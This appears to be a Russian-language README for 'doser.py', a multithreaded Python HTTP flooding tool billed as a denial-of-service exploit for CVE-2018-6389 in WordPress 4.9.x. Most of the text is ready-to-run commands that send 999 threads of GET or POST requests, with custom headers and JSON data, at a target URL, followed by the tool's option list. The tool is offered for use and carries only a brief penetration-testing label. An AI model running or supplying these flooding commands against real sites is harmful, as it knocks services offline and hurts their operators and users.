
Эксплойт на основе Python для отказа в обслуживании (CVE-2018-6389), нацеленный на WordPress 4.9.x. Поддерживает многопоточные GET/POST запросы с пользовательскими заголовками и JSON-нагрузками для тестирования на проникновение.
Инструмент DoS для HTTP-запросов (вдохновлён hulk, но с большей функциональностью), написанный на Python:
999 потоков отправляют GET-запросы:
python doser.py -t 999 -g 'https://targeted.site.com'
999 потоков отправляют POST-запросы с JSON-данными:
python doser.py -t 999 -p 'https://targeted.site.com' -ah 'Content-Type: application/json' -d '{"json": "payload"}'
usage: doser.py [-h] [-g G] [-p P] [-d D] [-ah AH] [-t T]
необязательные аргументы:
-h, --help показать это справочное сообщение и выйти
-g Указать GET-запрос. Использование: -g '< url >'
-p Указать POST-запрос. Использование: -p '< url >'
-d Указать полезную нагрузку данных для POST-запроса
-ah Указать дополнительный заголовок
-t Указать количество используемых потоков
Переписать на Golang :)